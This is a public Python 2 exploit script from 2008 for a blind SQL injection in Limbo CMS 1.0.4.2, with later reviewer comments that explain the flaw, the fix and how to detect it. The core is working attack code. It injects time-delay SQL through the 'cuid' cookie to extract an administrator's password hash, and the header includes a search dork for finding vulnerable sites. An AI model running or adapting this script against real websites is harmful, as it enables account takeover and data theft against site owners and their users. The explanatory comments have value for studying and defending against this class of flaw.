#!/usr/bin/python
|
|
#=================================================================================================#
|
|
# ____ __________ __ ____ __ #
|
|
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
|
|
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
|
|
# | | | \ | |/ \ \___| | /_____/ | || | #
|
|
# |___|___| /\__| /______ /\___ >__| |___||__| #
|
|
# \/\______| \/ \/ #
|
|
#=================================================================================================#
|
|
# This is a Public Exploit. #
|
|
# Date: 08/02/2008 [dd,mm,yyyy] #
|
|
# #
|
|
#=================================================================================================#
|
|
# Limbo 1.0.4.2 And Probably Lower Blind Sql Injection Exploit Benchmark Method #
|
|
# #
|
|
# Vendor: http://www.limbo-cms.com #
|
|
# Severity: Highest #
|
|
# Author: The:Paradox #
|
|
#=================================================================================================#
|
|
# Proud To Be Italian. #
|
|
#=================================================================================================#
|
|
"""
|
|
Related Codes:
|
|
class_auth.php; line 92:
|
|
|
|
function Auth()
|
|
{
|
|
if(isset($_SESSION['uid']) && $_SESSION['uid']!='')
|
|
{
|
|
$this->id=$_SESSION['uid'];
|
|
$this->initlogin();
|
|
return;
|
|
}
|
|
//cokkie
|
|
|
|
if(isset($_COOKIE['cuid']) && isset($_COOKIE['cusername']) && isset($_COOKIE['cpassword']))
|
|
{
|
|
global $conn,$lm_rand;
|
|
$row=$conn->GetRow("SELECT * FROM #__users WHERE id=".$_COOKIE['cuid']);
|
|
if($_COOKIE['cusername']==$row['username'] && $_COOKIE['cpassword']==md5($lm_rand.$row['password']) ) {
|
|
$this->id=$_COOKIE['cuid'];
|
|
$this->initlogin();
|
|
}
|
|
}
|
|
}
|
|
|
|
"""
|
|
#=================================================================================================#
|
|
# Proof Of Concept / Bug Explanation: #
|
|
# #
|
|
# Cuid cookie isn't properly checked. Blind Sql Injection Vulnerability. In this exploit I'll use #
|
|
# benchmark method. #
|
|
# Additionally database prefix isn't needed, 'cause the coder automatically replaces "#__" with #
|
|
# the prefix in GetRow Function (is a REAL bad practice) . #
|
|
# Limbo allows also an installation without sql database (Flat). I'm working on it. #
|
|
# This exploit cannot work on that type of installation. #
|
|
#=================================================================================================#
|
|
# Google Dork=> Site powered By Limbo CMS #
|
|
#=================================================================================================#
|
|
# Use this at your own risk. You are responsible for your own deeds. #
|
|
#=================================================================================================#
|
|
# Python Exploit Starts #
|
|
#=================================================================================================#
|
|
|
|
import httplib, sys, time
|
|
# --- Reviewer's reading of the script below ---------------------------------
# The header quotes Auth() from class_auth.php (line 92 per the header): the
# `cuid` cookie is concatenated straight into "SELECT * FROM #__users WHERE id="
# with no cast, quoting or parameter binding, so the cookie value is executed
# as SQL before the username/password cookies are even compared.  The
# application-side fix is to bind `id` as a query parameter (or at minimum
# cast it to an integer) and to take the user id from a server-side session
# rather than from a client cookie.  The script below infers the stored hash
# one hex digit at a time purely from response latency (MySQL benchmark()),
# so the observable signature is a burst of admin.php requests whose `cuid`
# cookie contains SQL syntax, each taking several seconds to answer.
# NOTE(review): Python 2 code (print statements, httplib); it does not parse
# under Python 3 and is kept here as the record of the 2008 advisory.

# Banner / usage text.  sys.argv[0] is the script name as invoked.
print "\n#=========================================================#"
print " Limbo CMS 1.0.4.2 And Probably Lower "
print " Blind Sql Injection Vulnerability "
print " Benchmark Method "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " %s [Target] [Path] [User_id] " % (sys.argv[0])
print " "
print " Example: "
print " %s 127.0.0.1 /limbo/ 1 " % (sys.argv[0])
print " %s www.host.com / 1 " % (sys.argv[0])
print " "
print " "
print "#=========================================================#\n"
# Fewer than three positional arguments: exit silently (the usage banner has
# already been printed above).  No further validation is done on the values.
if len(sys.argv)<=3: sys.exit()
else: print "[.]Exploit Starting."

# Positional arguments, used verbatim: host passed to HTTPConnection, URL
# path prefix for admin.php, and the numeric id spliced into the WHERE clause.
target = sys.argv[1]
path = sys.argv[2]
user_id = sys.argv[3]

# Tunables.  `benchmark` is the iteration count handed to MySQL benchmark()
# and is inserted into the cookie as a string; `vtime` is the round-trip
# threshold in seconds above which a candidate digit is taken as a hit.
# There is no baseline timing measurement, so the threshold is absolute.
benchmark = "200000000" #Set This One
vtime = 6 #Set This One
port = "80"

j=1          # 1-based position of the hash character currently being tested
h4sh = ""    # accumulated characters (never printed after the loop; see below)
md5tuple = []

# Candidate alphabet as ASCII codes: 48..57 is '0'..'9', 97..102 is 'a'..'f',
# i.e. the hexadecimal digit set of a 32-character MD5 digest.
for k in range(48,58): # 48->57 and 97->102
    md5tuple.append(k)
for k in range(97,103):
    md5tuple.append(k)
# Sentinel: reached only when no candidate for the current position produced
# the delay, which the script treats as unrecoverable.
md5tuple.append('END')
#Query will Result like this one ===> SELECT * FROM #__users WHERE id=(SELECT/**/IF((ASCII(SUBSTRING(password,1,1))=50),benchmark(30000000,CHAR(0)),null)/**/FROM/**/#__users/**/WHERE/**/id=1)
print "[.]Blind Sql Injection Starts.\n\nHash:"
# 32 positions: the script assumes the `password` column holds a hex MD5
# digest (consistent with the md5() use quoted in the header, though the
# stored format itself is not shown there).
while j <= 32:
    for i in md5tuple:
        if i == 'END': sys.exit('[-]Exploit Failed.\n')

        start = time.time()
        # A fresh connection per candidate; it is never closed explicitly.
        conn = httplib.HTTPConnection(target,port)


        # request(method, url, body, headers): the third positional argument
        # is the request body, passed here as an empty dict.  The injected
        # SQL travels entirely in the Cookie header; cusername/cpassword are
        # dummy values so that the isset() checks in Auth() pass.
        conn.request("GET", path + "admin.php", {}, {"Accept": "text/plain","Cookie": "cpassword=1; cusername=1; cuid=(SELECT/**/IF((ASCII(SUBSTRING(password," + str(j) + ",1))=" + str(i) + "),benchmark(" + benchmark + ",CHAR(0)),null)/**/FROM/**/#__users/**/WHERE/**/id="+user_id+");"})
        response = conn.getresponse()
        # Body is consumed and discarded; only status and elapsed time matter.
        read = response.read()

        # The 404 check runs after the full round trip, so a wrong path is
        # only detected once the first request has completed.
        if response.status == 404: sys.exit('[-]Error 404. Not Found.')
        now = time.time()

        # Timing oracle: any round trip longer than vtime seconds is counted
        # as a match.  Network jitter or a loaded server can therefore yield
        # a false positive, since no untriggered baseline is compared against.
        if now - start > vtime:
            sys.stdout.write(chr(i))
            sys.stdout.flush()
            h4sh += chr(i)
            j += 1
            break;


# h4sh is not included in this final message; the characters were only
# streamed to stdout as they were found.
print "\n\n[+]All Done.\n-=Paradox Got This One=-"
|
|
|
|
# milw0rm.com [2008-02-09] |